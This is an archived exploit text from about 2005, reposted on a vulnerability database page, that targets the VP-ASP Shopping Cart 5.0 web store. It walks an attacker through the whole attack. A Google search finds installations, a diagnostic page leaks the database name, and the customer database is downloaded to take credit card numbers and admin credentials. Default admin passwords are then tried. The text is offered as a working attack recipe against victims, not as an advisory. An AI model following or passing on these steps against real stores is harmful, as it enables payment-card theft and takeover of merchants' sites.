Lucene search
K

vpasp.txt

🗓️ 22 Feb 2005 00:00:00Reported by frisType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 686 Views

VP-ASP Shopping Cart 5.0 security exploit reveals database access methods and default credentials.

Code
`VP-ASP Shopping Cart Version 5.0 Google style by fris <[email protected]>  
  
Finding VP-ASP 5.00 Sites in Google:  
  
In google type:  
  
intitle:VP-ASP Shopping Cart 5.00  
  
You will find many websites with VP-ASP 5.00 cart software installed  
  
Now lets goto the exploit  
  
the page will be like this:  
  
****://***.victim.com/shop/shopdisplaycategories.asp  
  
The exploit is : diag_dbtest.asp  
  
so you want to do this:  
  
****://***.victim.com/shop/diag_dbtest.asp  
  
A page will appear that contains:  
  
xDatabase  
shopping140  
  
xDblocation  
resx  
  
xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSystemxEmailTypexOrdernumber  
  
The most important thing here is xDatabase  
  
xDatabase: shopping140  
  
ok now the url will be like this:  
  
****://***.victim.com/shop/shopping140.mdb  
  
if you didn't download the db  
  
try this while there is db location.  
  
xDblocation  
resx  
  
the url will be:  
  
****://***.victim.com/shop/resx/shopping140.mdb  
  
If u see the error message you can try this:  
  
****://***.victim.com/shop/shopping500.mdb  
  
download the mdb file and you should be able to open it with any mdb file   
viewer, most people have ms access for you windows people, open office   
for you *nix people, or you can goto download.com and get a .mdb   
viewer.  
  
inside the .mdb you should be able to find credit card information.  
and you should even be able to find the admin username and password for   
the website.  
  
the admin login page is usually located at  
  
****://***.victim.com/shop/shopadmin.asp   
  
if you cannot find the admin username and password in the mdb file or you   
can but it is incorrect, or you cannot find the mdb file at all then try   
to find the admin login page and enter the default passwords which are  
  
Username: admin  
password: admin  
  
or  
  
Username: vpasp  
password: vpasp  
  
------  
  
eof.  
  
shouts out to mosthated, ghettodmx, evian s sim, ragz, TFreak, and Paige  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation